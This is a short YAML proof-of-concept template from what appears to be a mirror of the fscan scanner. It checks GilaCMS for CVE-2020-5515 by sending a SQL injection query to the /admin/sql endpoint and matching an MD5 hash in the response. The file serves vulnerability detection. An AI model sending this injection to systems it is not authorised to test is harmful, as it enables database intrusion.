mirror of https://github.com/qwqdanchun/fscan.git
13 lines
388 B
YAML
13 lines
388 B
YAML
name: poc-yaml-gilacms-cve-2020-5515
|
|
set:
|
|
r1: randomInt(200000000, 210000000)
|
|
rules:
|
|
- method: GET
|
|
path: /admin/sql?query=SELECT%20md5({{r1}})
|
|
expression: |
|
|
response.body.bcontains(bytes(md5(string(r1))))
|
|
detail:
|
|
author: PickledFish(https://github.com/PickledFish)
|
|
links:
|
|
- https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/
|